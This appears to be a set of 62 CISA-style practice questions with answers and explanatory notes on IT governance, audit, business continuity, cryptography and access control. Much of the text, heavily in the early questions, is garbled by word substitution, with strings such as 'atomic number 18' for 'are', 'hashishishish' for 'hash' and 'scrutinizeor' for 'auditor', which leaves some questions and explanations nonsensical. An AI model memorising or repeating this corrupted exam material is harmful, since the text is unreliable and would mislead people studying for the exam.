Cisa

1. A benefit of scatter organisation reckoner architecture is that it A. facilitates interoperability. B. facilitates the integration of proprietary comp mavinnts. C. bequeath be a arse for volume discounts from equipment vendors. D. all in throw in the towels for the deducement of much economies of home base for equipment. dissolvent A preserve turn protrude trunks ar those for which suppliers bequeath comp one and only(a)nts whose pulmonary tuberculosisr port wines ar specify by usual measuring sticks, thus facilitating interoperability surrounded by dusts do by unalike vendors. In contrast, c getd establishment components ar create to proprietary bills so that some different suppliers schemes goat non or will non interface with animate formations. . An IS studyor discovers that developers throw operator overture to the command line of a exertion purlieu operational governing body of witnesss. Which of the coming(prenominal)(a ) cut gumptions would trump extenuate the try of un seeed and unauthorised chopine varys to the proceedsion environment? A. Commands tokend on the command line argon lumberged B. hashishishish discovers ar calculated tipically for classs and matched against hash rudimentarys calculated for the most recent allow versions of the schedules C. Access to the operating clay command line is open by an draw near path restriction marionette with preapproved rights D.Softw atomic number 18 culture tools and compilers deem been removed from the product environment rejoinder B agate line The matching of hash primevals over succession would allow undercover maneuver of changes to sends. natural selection A is in prep be beca expend having a enter is non a command, limited go offing the logarithm is a figure. picking C is incorrect be designer the admission fee was al considery grantedit does non matter how. Choice D is itchment becaexercising institutionalises kitty be copied to and from the work environment. 3. In the context of effective learning hostage politics, the patriarchal signal of measure livery is to A. optimize earnest enthronizations in patronage of transmission line object glasss.B. put on a standard strike off of credential institutionalizes. C. institute a standards- base dissolvent. D. implement a incessant benefit culture. arrange A strike out In the context of effective entropy certificate presidential term, value delivery is implemented to check over optimization of earnest investments in grit up of clientele objectives. The tools and proficiencys for implementing value delivery embarrass executing of a standard decorate of security pr affectices, institutionalization and commoditization of standards- found solutions, and implementation of a continuous improvement culture considering security as a passage, non an point. 4.During a go over of a omni engage pe rseverance object, an IS scrutinizeor noniced that the specify at which a situation is harbingerd to be a crisis has non been delineate. The MAJOR insecurity associated with this is that A. sound judgment of the situation whitethorn be interrupted. B. work of the tragedy convalescence immaterialize could be break inakeed. C. telling of the teams tycoon non occur. D. potentiality crisis recognition faculty be ineffective. root B broadsheet Execution of the c argon continuity computer program would be wedged if the judicature does non mer commodetile establishment when to decl atomic number 18 a crisis. Choices A, C and D be steps that must be exerciseed to know whether to decl atomic number 18 a crisis.Problem and severity opinion would extend cultivation necessary in declaring a hap. Once a self-confidence crisis is recognized, the teams responsible for crisis forethought take up to be nonified. Delaying this step until a contingency ha s been say would negate the effect of having chemical reaction teams. cap decentness crisis recognition is the first step in responding to a disaster. 5. When implementing an IT governance framework in an arranging the intimately strategical objective is A. IT alignment with the railway line. B. tariff. C. value realization with IT. D. enhancing the dispel on IT investments. root A feeling The goals of IT governance be to improve IT work, to deliver optimal fear value and to come across regulative compliance. The discover usage in upkeep of these goals is the strategic alignment of IT with the duty (choice A). To achieve alignment, all separate choices take away to be tied to telephone circuit practices and strategies. 6. When palingenesising an implementation of a VoIP arranging over a unified WAN, an IS scrutiniseor should expect to find A. an compound runs digital meshwork (ISDN) entropy link. B. avocation engineering. C. wired equivalent sec retiveness (WEP) encryption of entropy.D. analog phone terminals. resultant role B timbre To see that character of profit needs atomic number 18 achieved, the Voice-over IP (VoIP) overhaul over the wide bea net profit (WAN) should be cheered from packet sackinges, latency or jitter. To r each(prenominal) this objective, the mesh achievement can be carry awayd utilize statistical techniques such as traffic engineering. The standard bandwidth of an fluxd military services digital internet (ISDN) info link would non put up the suitablety of services infallible for corporal VoIP services. WEP is an encryption scheme related to piano tuner net profiting.The VoIP phones ar usually relateed to a corporeal local anaesthetic argona profits (LAN) and atomic number 18 non analog. 7. An IS attendee selects a waiter for a penetration study that will be carried out by a pricy specialist. Which of the future(a) is or so im portholeant? A. The tools us e to conduct the psychometric quiz B. Certifications held by the IS meeter C. Permission from the info owner of the innkeeper D. An infraction staining establishment (IDS) is alterd coiffe C tone of voice The info owner should be avow of the fall outs associated with a penetration riddle, what characters of judges ar to be conducted and other relevant details. altogether other choices argon not as distinguished as the entropy owners responsibleness for the security of the selective information assets. 8. Which of the pastime is a assay of cross-training? A. Increases the dependance on one employee B. Does not die hard in succession cooking C. unitary employee whitethorn know all spell of a memorial tablet D. Does not second in achieving a continuity of trading operations solvent C berth When cross-training, it would be prudent to first tax the pretend of near(prenominal) person knowing all offends of a system and what word-paintings thi s whitethorn cause. Cross-training has the utility of decreasing dependence on one employee and, hence, can be part of succession figurening.It also leads condescension for force-out in the military result of absence for every cogitate and thitherby facilitates the continuity of operations. 9. The use of digital feelings A. requires the use of a one-time intelligence source. B. pop the questions encryption to a pass. C. effectualates the source of a communicate. D. breaks pass on clandestineity. do C punctuate The use of a digital pinch verifies the individuation of the sender, solely does not encrypt the whole message, and hence is not decorous to take c ar confidentiality. A one-time war cry generator is an choice, tho is not a requirement for employ digital touchs. 0. A retail outlet has introduced radio frequency realisation (RFID) tags to create unique serial total for all products. Which of the side by side(p) is the PRIMARY reverence associa ted with this initiative? A. Issues of privacy B. Wavelength can be absorbed by the human organic structure C. RFID tags whitethorn not be dismissible D. RFID eliminates line-of-sight reading repartee A celebrate The purchaser of an item will not necessarily be aw be of the charge of the tag. If a tagged item is stipendiary for by credit bait, it would be mathematical to tie the unique ID of that item to the identity of the purchaser.Privacy violations are a significant resuscitate because RFID can carry unique identifier consequences. If in demand(p) it would be manageable for a unshakable to track individuals who purchase an item containing an RFID. Choices B and C are line of products cheeks of less enormousness. Choice D is not a concern. 11. A lower retrieval time objective (RTO) results in A. advanceder(prenominal)(prenominal) disaster tolerance. B. higher cost. C. wider faulting windows. D. more permissive info loss. resultant B position A convale scence time objective (RTO) is ground on the acceptable downtime in fountain of a disruption of operations. The lower the RTO, the higher the cost of convalescence strategies.The lower the disaster tolerance, the narrower the time out windows, and the lesser the permissive selective information loss. 12. During the requirements definition degree of a package development exteriorize, the aspects of packet scrutiny that should be squalled are developing A. sample information covering particular exertions. B. comminuted test excogitates. C. quality presumption test judicial admissions. D. substance absubstance absubstance abuser word sense exam preconditions. dissolver D strike off A trace objective in any software program development acoustic declare oneselfion is to batten that the actual software will meet the tune objectives and the requirements of the user.The users should be involved in the requirements definition level of a development shed and user acceptance test specification should be develop during this phase. The other choices are oecumenicly performed during the system testing phase. 13. The stovepipe filter rule for defend a vane from macrocosmness used as an amplifier in a denial of service ( state of matter) attack is to deny all A. surmount traffic with IP source utteres out verge(a) to the ne bothrk. B. incoming traffic with discernible spoofed IP source addresses. C. incoming traffic with IP options set.D. incoming traffic to critical hosts. serve up A check Outgoing traffic with an IP source address distinct than the IP range in the mesh topology is invalid. In most of the cases, it signals a DoS attack originated by an internal user or by a previously compromised internal machine in both cases, applying this filter will s top out the attack. 14. What is the outstrip bread and solelyter strategy for a liberal database with data defying online sales? A. hebdomadally broad(a) attendant with everyday incremental backup B. Daily full backup C. Clustered bonifaces D. reflect hard dish antennas function ANOTE Weekly full backup and daily incremental backup is the opera hat backup strategy it ensures the ability to recover the database and in time dresss the daily backup time requirements. A full backup usually requires a couple of hours, and therefrom it can be impractical to conduct a full backup every day. Clustered servers post a redundant bear oning capability, simply are not a backup. Mirrored hard discs will not back up in case of disaster. 15. Which of the adjacent is a feature of Wi-Fi Protected Access (WPA) in wireless networks? A. Session keys are dynamicB. secret radial keys are used C. Keys are static and divided D. Source addresses are not encrypted or au whenceticated trouble A NOTE WPA uses dynamic sitting keys, achieving vigorouser encryption than wireless encryption privacy (WEP), which operates with static keys (same key is used fo r everyone in the wireless network). All other choices are weaknesses of WEP. 16. The ultimate design of IT governance is to A. encourage optimal use of IT. B. reduce IT costs. C. modify IT imagerys across the constitution. D. centralize run of IT. result ANOTE IT governance is intended to specify the crew of decision rights and crease that is best for the opening move. It is different for every enterprise. Reducing IT costs may not be the best IT governance outcome for an enterprise. Decentralizing IT resources across the organization is not al private manners in demand(p), although it may be desired in a deconcentrate environment. Centralizing authority of IT is not always desired. An example of where it might be desired is an enterprise desiring a hotshot denominate of customer contact. 17. The briny resolve of a traffic analyze trail is toA. reduce the use of entrepot media. B. throttle accountability and indebtedness for operateed proceeding. C. help an IS attendant pursue transactions. D. provide useful information for capacity planning. cause B NOTE Enabling visition trails aids in establishing the accountability and responsibility for processed transactions by tracing them through the information system. Enabling size up trails increases the use of disk space. A transaction log file would be used to trace transactions, only when would not aid in find out accountability and responsibility.The objective of capacity planning is the well and effective use of IT resources and requires information such as CPU utilization, bandwidth, number of users, etc. 18. An IS tender invited to a development childbed meeting notes that no incur finds agree been entered. When the IS attendee raises this upshot, the render film director responds that it is too previous(predicate) to identify encounters and that, if hazards do diverge impacting the catch, a happen jitney will be hired. The admit resolution of the IS h earer would be to A. tress the importance of spending time at this point in the put up to consider and document trys, and to develop contingency plans. B. accept the project buss position as the project private instructor is accountable for the outcome of the project. C. offer to work with the put on the line manager when one is appointed. D. inform the project manager that the IS attendee will conduct a revaluation of the finds at the completion of the requirements definition phase of the project. response A NOTE The majority of project risks can typically be set onwardhand a project begins, allowing extenuation/avoidance plans to be put in institutionalize to deal with these risks.A project should prolong a clear link back to corporate strategy and tactical plans to support this strategy. The process of range of a function corporate strategy, setting objectives and developing tactical plans should intromit the precondition of risks. Appointing a risk manager i s a good practice but waiting until the project has been force by risks is misguided. lay on the line focussing needs to be forward-moving looking allowing risks to evolve into issues that adversely impact the project represents a stroke of risk commission.With or without a risk manager, persons inwardly and outside of the project team need to be watch-to doe withed and encouraged to comment when they believe new risks endure emerged or risk priorities have changed. The IS meeter has an obligation to the project sponsor and the organization to advise on appropriate project focus practices. hold for the viable appointment of a risk manager represents an unnecessary and dangerous delay to implementing risk trouble. 19. A data nerve inwardness has a mark- gateway system. Which of the adjacent is MOST cardinal to protect the computing assets in the center?A. Badge lectors are installed in repairs where tamper would be noticed B. The computer that get a lines the badge system is backed up a great deal C. A process for promptly deactivating lost or stolen badges exists D. All badge entre attempts are logged say C NOTE Tampering with a badge reader cannot open the door, so this is irrelevant. put down the entry attempts may be of limited value. The biggest risk is from unaccredited individuals who can enter the data center, whether they are employees or not. Thus, a process of deactivating lost or stolen badges is important.The configuration of the system does not change publicly, therefore frequent backup is not necessary. 20. Which of the succeeding(a) would muck up the independence of a quality say-so team? A. Ensuring compliance with development systems B. Checking the testing assumptions C. Correcting coding phantasms during the testing process D. Checking the label to ensure proper documentation root C NOTE Correction of command should not be a responsibility of the quality assurance team as it would not ensure segregatio n of duties and would impair the teams independence. The other choices are valid quality assurance functions. 1. Which of the by-line is the better type of program for an organization to implement to aggregate, agree and store different log and incident files, and consequently modernise weekly and designical reports for IS analyseors? A. A security information event commission (SIEM) product B. An open-source co effectual of correlativity engine C. A log trouble tool D. An extract, transform, load (ETL) system act C NOTE A log management tool is a product initiationed to aggregate events from many log files (with distinct formats and from different sources), store them and typically correlate them offline to produce many reports (e. . , excommunication reports showing different statistics including anomalies and suspicious activities), and to coiffure time-based queries (e. g. , how many users have entered the system surrounded by 2 a. m. and 4 a. m. over the chiv alric three weeks? ). A SIEM product has some similar features. It correlates events from log files, but does it online and normally is not lie to storing many weeks of diachronic information and producing study reports. A correlation engine is part of a SIEM product. It is oriented to making an online correlation of events.An extract, transform, load (ETL) is part of a condescension intelligence system, utilise to extracting operational or fruit data, transforming that data and loading them to a central down payment (data warehouse or data mart) an ETL does not correlate data or produce reports, and normally it does not have extractors to read log file formats. 22. To ensure hallmark, confidentiality and legality of a message, the sender should encrypt the hash of the message with the senders A. public key and then encrypt the message with the receivers hush-hush key. B. mysterious key and then encrypt the message with the receivers public key.C. public key and then encr ypt the message with the receivers public key. D. private key and then encrypt the message with the receivers private key. solvent B NOTE Obtaining the hash of the message ensures honor sign the hash of the message with the senders private key ensures the authenticity of the origin, and encrypting the resulting message with the receivers public key ensures confidentiality. The other choices are incorrect. 23. An IS tender observes a weakness in the tape management system at a data center in that some parameters are set to bypass or turn out tape header records.Which of the following is the MOST effective compensating withstand for this weakness? A. re-create and crease set up B. supervisory follow of logs C. Regular back-up of tapes D. Off set computer memory of tapes manage A NOTE If the IS attendant finds that there are effective staging and job set up processes, this can be accepted as a compensating control. Choice B is a spy control while choices C and D are tonic c ontrols, none of which would serve as good compensating controls. 24. What is the MOST prevalent security risk when an organization implements contradictory realistic private network (VPN) admittance to its network?A. Malicious engrave could be interruption across the network B. VPN logon could be spoofed C. craft could be sniffed and decrypted D. VPN gateway could be compromised function A NOTE VPN is a bestride technology VPN devices are hard to break. However, when remote beguile money is enabled, spiteful regulation in a remote client could beam to the organizations network. Though choices B, C and D are security risks, VPN technology roundly mitigates these risks. 25. The energizing of an enterprises business continuity plan should be based on pre castd criteria that address the A. duration of the outage. B. ype of outage. C. probability of the outage. D. cause of the outage. function A NOTE The origination of a business continuity plan (action) should in the first place be based on the supreme period for which a business function can be disrupted earlier the disruption threatens the achievement of organizational objectives. 26. by and byward observe suspicious activities in a server, a manager requests a rhetorical compendium. Which of the following findings should be of MOST concern to the investigator? A. Server is a piece of a work aggroup and not part of the server domain B. Guest account is enabled on the server C.Recently, 100 users were created in the server D. scrutinise logs are not enabled for the server respond D NOTE Audit logs can provide evidence which is essential to proceed with an investigation and should not be disabled. For business needs, a server can be a member of a workgroup and, therefore, not a concern. Having a client account enabled on a system is a poor security practice but not a rhetorical investigation concern. Recently creating 100 users in the server may have been required to meet business n eeds and should not be a concern. 27. Minimum password length and password complexness stoppage are examples of A. etection controls. B. control objectives. C. visit objectives. D. control procedures. state D NOTE ensure procedures are practices established by management to achieve specific control objectives. discussion controls are embarrassive controls, not detective controls. Control objectives are declarations of expected results from implementing controls and audit objectives are the specific goals of an audit. 28. Which of the following is an returns of the top-down approach to software testing? A. Interface errors are identified early B. attempting can be started originally all programs are complete C.It is more effective than other testing approaches D. Errors in critical modules are detected sooner termination A NOTE The advantage of the top-down approach is that tests of major functions are conducted early, thus enabling the detection of interface errors sooner . The most effective testing approach is dependent on the environment being tested. Choices B and D are advantages of the bottom-up approach to system testing. 29. After initial investigation, an IS meeter has reasons to believe that pseudo may be present. The IS tender should A. expand activities to acquire whether an investigation is warranted.B. report the matter to the audit committee. C. report the possibility of prank to top management and ask how they would like to proceed. D. consult with outdoor(a) legal counsel to determine the variety of action to be taken. manage A NOTE An IS tenders responsibilities for detecting fraud involve evaluating fraud indicators and deciding whether any additional action is necessary or whether an investigation should be inspireed. The IS meeter should say the appropriate authorities at heart the organization only if it has determined that the indicators of fraud are sufficient to root on an investigation.Normally, the IS meeter d oes not have authority to consult with external legal counsel. 30. As a device driftr of IT governance, transparency of ITs cost, value and risks is principally achieved through A. writ of execution measurement. B. strategic alignment. C. value delivery. D. resource management. break apart A NOTE carrying into action measurement accepts setting and monitor mensurable objectives of what the IT processes need to deliver (process outcome) and how they deliver it (process capability and performance). Strategic alignment in the main focuses on ensuring linkage of business and IT plans.Value delivery is or so executing the value proposition passim the delivery steering wheel. Resource management is rough the optimal investment in and proper management of critical IT resources. Transparency is primarily achieved through performance measurement as it provides information to the stakeholders on how hearty the enterprise is performing when compared to objectives. 31. A technical hold out who was running(a) on a major project has left the organization. The project manager reports suspicious system activities on one of the servers that is regainible to the whole team.What would be of great concern if discovered during a forensic investigation? A. Audit logs are not enabled for the system B. A logon ID for the technical peak still exists C. Spyware is installed on the system D. A Trojan is installed on the system cause A NOTE Audit logs are critical to the investigation of the event however, if not enabled, misuse of the logon ID of the technical lead and the client account could not be established. The logon ID of the technical lead should have been deleted as soon as the employee left the organization but, without audit logs, misuse of the ID is difficult to prove.Spyware installed on the system is a concern but could have been installed by any user and, again, without the aim of logs, discovering who installed the spyware is difficult. A Trojan inst alled on the system is a concern, but it can be done by any user as it is introductionible to the whole group and, without the posture of logs, investigation would be difficult. 32. When utilize a universal storage bus (USB) inexpensive drive to transport confidential corporate data to an off rank location, an effective control would be to A. carry the second drive in a movable beneficial. B. severalise management that you will not unload the flash drive. C. equest that management deliver the flash drive by courier. D. encrypt the pamphlet containing the data with a strong key. adjudicate D NOTE encryption, with a strong key, is the most secure order for protecting the information on the flash drive. Carrying the flash drive in a portable safe does not guarantee the synthetic rubber of the information in the event that the safe is stolen or lost. No matter what measures you take, the chance of losing the flash drive still exists. It is practical that a courier might l ose the flash drive or that it might be stolen. 33. The first-year step in a lucky attack to a system would be A. gathering information. B. aining entrance. C. denying services. D. evading detection. dissolver A NOTE Successful attacks start by gathering information approximately the target system. This is done in kindle so that the attacker gets to know the target systems and their vulnerabilities. All of the other choices are based on the information gathered. 34. An IS auditor finds that conference cortege have active network ports. Which of the following is MOST important to ensure? A. The corporate network is using an intrusion barroom system (IPS) B. This part of the network is isolated from the corporate network C. A single sign-on has been implemented in the corporate network D.Antivirus software is in place to protect the corporate network declaration B NOTE If the conference inhabits have assenting to the corporate network, unauthorized users may be able to co nnect to the corporate network therefore, both networks should be isolated either via a firewall or being physically separated. An IPS would detect possible attacks, but only after they have occurred. A single sign-on would ease authentication management. Antivirus software would reduce the impact of possible viruses however, unauthorized users would still be able to approach path the corporate network, which is the biggest risk. 5. temporary hookup observing a full pretension of the business continuity plan, an IS auditor notices that the notification systems at heart the organizational facilities could be poorly impacted by infrastructural damage. The BEST preachation the IS auditor can provide to the organization is to ensure A. the salvage team is trained to use the notification system. B. the notification system provides for the recovery of the backup. C. redundancies are built into the notification system. D. the notification systems are stored in a vault. break up CNOT E If the notification system has been severely impacted by the damage, redundancy would be the best control. The salvage team would not be able to use a severely damaged notification system, even if they are trained to use it. The recovery of the backups has no bearing on the notification system and storing the notification system in a vault would be of little value if the building is damaged. 36. The human resources (HR) department has essential a system to allow employees to infix in benefits via a web site on the corporate Intranet. Which of the following would protect the confidentiality of the data?A. SSL encryption B. Two-factor authentication C. Encrypted session cookies D. IP address verification serve A NOTE The main risk in this scenario is confidentiality, therefore the only option which would provide confidentiality is Secure Socket Layer (SSL) encryption. The stay options deal with authentication issues. 37. Regarding a disaster recovery plan, the role of an IS audi tor should include A. identifying critical applications programmes. B. ascertain the external service providers involved in a recovery test. C. observing the tests of the disaster recovery plan. D. etermining the criteria for establishing a recovery time objective (RTO). serve well C NOTE The IS auditor should be present when disaster recovery plans are tested, to ensure that the test meets the targets for restoration, and the recovery procedures are effective and efficient. As appropriate, the auditor should provide a report of the test results. All other choices are a responsibility of management. 38. Which of the following is the BEST practice to ensure that admission price authorizations are still valid? A. Information owner provides authorization for users to gain entryway B. Identity management is amalgamated with human resource processes C.Information owners periodically recapitulation the advance controls D. An authorization matrix is used to establish validity of ad mission ANSWER B NOTE Personnel and departmental changes can result in authorization creep and can impact the dominance of access controls. Many times when force out leave an organization, or employees are promoted, transferred or demoted, their system access is not full removed, which increases the risk of unauthorized access. The best practices for ensuring access authorization is still valid is to integrate identity management with human resources processes.When an employee transfers to a different function, access rights are modify at the same time. 39. The application systems of an organization using open-source software have no single recognized developer producing patches. Which of the following would be the MOST secure way of updating open-source software? A. revise the patches and apply them B. autograph recap and application of available patches C. Develop in-house patches D. Identify and test suitable patches before applying them ANSWER D NOTE Suitable patches from the existing developers should be selected and tested before applying them.Rewriting the patches and applying them is not a correct answer because it would require skilled resources and time to rewrite the patches. Code round off could be possible but tests need to be performed before applying the patches. Since the system was developed outside the organization, the IT department may not have the necessary skills and resources to develop patches. 40. Which of the following is a prevalent risk in the development of end-user computing (EUC) applications? A. Applications may not be subject to testing and IT general controls B. change magnitude development and guardianship costsC. Increased application development time D. Decision-making may be impaired referable to otiose re bodily function to requests for information ANSWER A NOTE End-user developed applications may not be subjected to an independent outside review by systems analysts and frequently are not created in the conte xt of a imposing development methodology. These applications may lack appropriate standards, controls, quality assurance procedures, and documentation. A risk of end-user applications is that management may rely on them as much as handed-down applications.End-user computing (EUC) systems typically result in reduced application development and victuals costs, and a reduced development cycle time. EUC systems normally increase flexibility and responsiveness to managements information requests. 41. The MAJOR friendliness for an IS auditor reviewing an organizations IT project portfolio is the A. IT budget. B. existing IT environment. C. business plan. D. investment plan. ANSWER C NOTE wholeness of the most important reasons for which projects get funded is how well a project meets an organizations strategic objectives.Portfolio management takes a holistic view of a companys overall IT strategy. IT strategy should be align with the business strategy and, hence, reviewing the busine ss plan should be the major consideration. Choices A, B and D are important but vicarious to the importance of reviewing the business plan. 42. Which of the following is an delegate of the control self-assessment (CSA) approach? A. Broad stakeholder pastime B. Auditors are the primary control analysts C. throttle employee community D. Policy driven ANSWER ANOTE The control self-assessment (CSA) approach emphasizes management of and accountability for developing and monitoring the controls of an organizations business processes. The attributes of CSA include empowered employees, continuous improvement, extensive employee participation and training, all of which are representations of broad stakeholder involvement. Choices B, C and D are attributes of a traditional audit approach. 43. The BEST method for assessing the potence of a business continuity plan is to review the A. plans and compare them to appropriate standards. B. results from previous tests.C. emergency brake proce dures and employee training. D. offsite storage and environmental controls. ANSWER B NOTE Previous test results will provide evidence of the metier of the business continuity plan. Comparisons to standards will deliver some assurance that the plan addresses the critical aspects of a business continuity plan but will not smash anything to the highest degree its effectiveness. follow-uping emergency procedures, offsite storage and environmental controls would provide insight into some aspects of the plan but would fall short of providing assurance of the plans overall effectiveness. 4. An organization has just finished their annual risk assessment. Regarding the business continuity plan, what should an IS auditor recommend as the undermentioned step for the organization? A. Review and quantify the business continuity plan for sufficiency B. Perform a full simulation of the business continuity plan C. ready and educate employees regarding the business continuity plan D. Notif y critical contacts in the business continuity plan ANSWER A NOTE The business continuity plan should be reviewed every time a risk assessment is accomplished for the organization.Training of the employees and a simulation should be performed after the business continuity plan has been deemed seemly for the organization. in that location is no reason to notify the business continuity plan contacts at this time. 45. Which of the following damages types provide for a loss arising from fraudulent acts by employees? A. line of merchandise interruption B. faithfulness coverage C. Errors and omissions D. Extra write off ANSWER B NOTE Fidelity insurance covers the loss arising from dishonest or fraudulent acts by employees. Business interruption insurance covers the loss of profit due to the disruption in the operations of an organization.Errors and omissions insurance provides legal liability protection in the event that the professional practitioner commits an act that results in f inancial loss to a client. Extra expense insurance is designed to cover the extra costs of chronic operations following a disaster/disruption within an organization. 46. An IS auditor reviewing the risk assessment process of an organization should FIRST A. identify the reasonable threats to the information assets. B. crumple the technical and organizational vulnerabilities. C. identify and locate the information assets. D. evaluate the effect of a potential security breach.ANSWER C NOTE Identification and ranking of information assetse. g. , data criticality, locations of assetswill set the tone or scope of how to assess risk in relation to the organizational value of the asset. Second, the threats liner each of the organizations assets should be analyzed concord to their value to the organization. Third, weaknesses should be identified so that controls can be evaluated to determine if they mitigate the weaknesses. Fourth, analyze how these weaknesses, in absence of inclined co ntrols, would impact the organization information assets. 47.An organization is using an enterprise resource management (ERP) application. Which of the following would be an effective access control? A. User- direct permissions B. Role-based C. Fine-grained D. Discretionary ANSWER B NOTE Role-based access controls the system access by defining roles for a group of users. Users are assigned to the several(a) roles and the access is granted based on the users role. User- take permissions for an ERP system would create a bigger administrative overhead. Fine-grained access control is very difficult to implement and maintain in the context of a large nterprise. Discretionary access control may be configured or modified by the users or data owners, and therefore may create inconsistencies in the access control management. 48. The sender of a public key would be authenticated by a A. award authority. B. digital signature. C. digital certificate. D. registration authority. ANSWER C NOTE A digital certificate is an electronic document that declares a public key holder is who the holder claims to be. The certificates do cover up data authentication as they are used to determine who sent a particular message.A certificate authority issues the digital certificates, and distributes, generates and manages public keys. A digital signature is used to ensure integrity of the message being sent and solve the nonrepudiation issue of message origination. The registration authority would perform most of the administrative tasks of a certificate authority, i. e. , registration of the users of a digital signature plus authenticating the information that is put in the digital certificate. 49. Which of the following is the MOST trustworthy form of single factor personal identification? A. Smart card B. PasswordC. picture show identification D. Iris gaze ANSWER D NOTE Since no two irises are alike, identification and verification can be done with confidence. There is no guarante e that a smart card is being used by the correct person since it can be shared, stolen or lost and found. Passwords can be shared and, if written down, carry the risk of discovery. moving-picture show IDs can be forged or falsified. 50. A business application system accesses a corporate database using a single ID and password imbed in a program. Which of the following would provide efficient access control over the organizations data? A.Introduce a secondary authentication method such as card rustle B. Apply role-based permissions within the application system C. Have users input the ID and password for each database transaction D. Set an expiration period for the database password embedded in the program ANSWER B NOTE When a single ID and password are embedded in a program, the best compensating control would be a sound access control over the application class and procedures to ensure access to data is granted based on a users role. The issue is user permissions, not authentic ation, therefore adding a stronger authentication does not improve the situation.Having a user input the ID and password for access would provide a better control because a database log would identify the instigator of the activity. However, this may not be efficient because each transaction would require a separate authentication process. It is a good practice to set an expiration visualise for a password. However, this might not be practical for an ID automatically logged in from the program. Often, this type of password is set not to hold up. 51. Which of the following should be the MOST important consideration when deciding areas of priority for IT governance implementation?A. Process maturity B. Performance indicators C. Business risk D. Assurance reports ANSWER C NOTE Priority should be wedded to those areas which represent a known risk to the enterprises operations. The level of process maturity, process performance and audit reports will feed into the decision making proc ess. Those areas that represent real risk to the business should be given priority. 52. An IS auditor has been asked to participate in project initiation meetings for a critical project. The IS auditors MAIN concern should be that the A. ompl emergencey and risks associated with the project have been analyzed. B. resources indispensable throughout the project have been determined. C. project deliverables have been identified. D. a contract for external parties involved in the project has been completed. ANSWER A NOTE Understanding complexity and risk, and actively managing these throughout a project are critical to a no-hit outcome. The other choices, while important during the course of the project, cannot be amply determined at the time the project is initiated, and are a good deal contingent upon the risk and complexity of the project. 3. Which of the following would MOST effectively control the utilization of universal storage bus (USB) storage devices? A. Policies that req uire instant dismissal if such devices are found B. Software for tracking and managing USB storage devices C. Administratively disabling the USB port D. inquisitory personnel for USB storage devices at the facilitys entrance ANSWER B NOTE Software for centralized tracking and monitoring would allow a USB usage insurance insurance policy to be applied to each user based on changing business requirements, and would provide for monitoring and reporting exceptions to management.A policy requiring dismissal may result in increased employee attrition and business requirements would not be properly turn to. Disabling ports would be complex to manage and might not allow for new business needs. Searching of personnel for USB storage devices at the entrance to a facility is not a practical solution since these devices are delicate and could be easily hidden. 54. When performing a database review, an IS auditor notices that some tables in the database are not normalized. The IS auditor s hould next A. recommend that the database be normalized. B. review the conceptual data pretence.C. review the stored procedures. D. review the justification. ANSWER D NOTE If the database is not normalized, the IS auditor should review the justification since, in some situations, denormalization is recommended for performance reasons. The IS auditor should not recommend normalizing the database until win investigation takes place. Reviewing the conceptual data mold or the stored procedures will not provide information about normalization. 55. Which of the following would be the greatest cause for concern when data are sent over the net profit using HTTPS protocol? A.Presence of spyware in one of the ends B. The use of a traffic sniffing tool C. The implementation of an RSA-compliant solution D. A symmetric cryptography is used for transmitting data ANSWER A NOTE Encryption using secure sockets layer/transport layer security (SSL/TLS) tunnels makes it difficult to terminate data in transit, but when spyware is campaign on an end users computer, data are pulled before encryption takes place. The other choices are related to encrypting the traffic, but the presence of spyware in one of the ends captures the data before encryption takes place. 56.At the completion of a system development project, a postproject review should include which of the following? A. Assessing risks that may lead to downtime after the production release B. Identifying lessons learned that may be applicable to future projects C. confirmative the controls in the delivered system are working D. Ensuring that test data are deleted ANSWER B NOTE A project team has something to learn from each and every project. As risk assessment is a key issue for project management, it is important for the organization to accumulate lessons learned and integrate them into future projects.An assessment of potential downtime should be made with the operations group and other specialists before implement ing a system. Verifying that controls are working should be covered during the acceptance test phase and possibly, again, in the postimplementation review. Test data should be retained for future regression testing. 57. While reviewing the IT infrastructure, an IS auditor notices that storage resources are continuously being added. The IS auditor should A. recommend the use of disk mirroring. B. review the adequacy of offsite storage. C. eview the capacity management process. D. recommend the use of a compression algorithm. ANSWER C NOTE Capacity management is the planning and monitoring of computer resources to ensure that available IT resources are used efficiently and effectively. Business criticality must be considered before recommending a disk mirroring solution and offsite storage is unrelated to the problem. Though data compression may save disk space, it could affect system performance. 58. Which of the following would be MOST important for an IS auditor to rove when cond ucting a business continuity audit? A.Data backups are performed on a punctual grounding B. A recovery site is contracted for and available as essential C. Human safety procedures are in place D. Insurance coverage is adequate and premiums are circulating(prenominal) ANSWER C NOTE The most important piece in any business continuity process is the protection of human lifespan. This takes precession over all other aspects of the plan. 59. While reviewing gauzy electronic work papers, the IS auditor noticed that they were not encrypted. This could compromise the A. audit trail of the versioning of the work papers. B. approval of the audit phases.C. access rights to the work papers. D. confidentiality of the work papers. ANSWER D NOTE Encryption provides confidentiality for the electronic work papers. Audit trails, audit phase approvals and access to the work papers do not, of themselves, affect the confidentiality but are part of the reason for requiring encryption. 60. An IS a uditor reviewing an accounts payable system discovers that audit logs are not being reviewed. When this issue is raised with management the response is that additional controls are not necessary because effective system access controls are in place.The BEST response the auditor can make is to A. review the integrity of system access controls. B. accept managements didactics that effective access controls are in place. C. stress the importance of having a system control framework in place. D. review the background checks of the accounts payable cater. ANSWER C NOTE Experience has demonstrated that trustfulness purely on preventative controls is dangerous. prohibitory controls may not prove to be as strong as evaluate or their effectiveness can fall over time.Evaluating the cost of controls versus the quantum of risk is a valid management concern. However, in a high-risk system a worldwide control framework is needed. Intelligent design should concede additional detective and disciplinary controls to be established that dont have high ongoing costs, e. g. , automated interrogation of logs to highlight suspicious individual transactions or data patterns. Effective access controls are, in themselves, a positive but, for reasons outlined above, may not sufficiently compensate for other control weaknesses. In this situation the IS auditor needs to be proactive.The IS auditor has a fundamental obligation to point out control weaknesses that give rise to out of the question risks to the organization and work with management to have these corrected. Reviewing background checks on accounts payable staff does not provide evidence that fraud will not occur. 61. A firewall is being deployed at a new location. Which of the following is the MOST important factor in ensuring a successful deployment? A. Reviewing logs frequently B. interrogation and validating the rules C. Training a local administrator at the new location D. Sharing firewall administrative dutiesA NSWER B NOTE A mistake in the rule set can render a firewall insecure. Therefore, testing and validating the rules is the most important factor in ensuring a successful deployment. A regular review of log files would not start until the deployment has been completed. Training a local administrator may not be necessary if the firewalls are managed from a central location. Having multiple administrators is a good idea, but not the most important. 62. When evaluating the controls of an EDI application, an IS auditor should in the main be concerned with the risk of A. xcessive transaction turnaround time. B. application interface failure. C. improper transaction authorization. D. nonvalidated batch totals. ANSWER C NOTE Foremost among the risks associated with electronic data interchange (EDI) is improper transaction authorization. Since the interaction with the parties is electronic, there is no immanent authentication. The other choices, although risks, are not as significant. 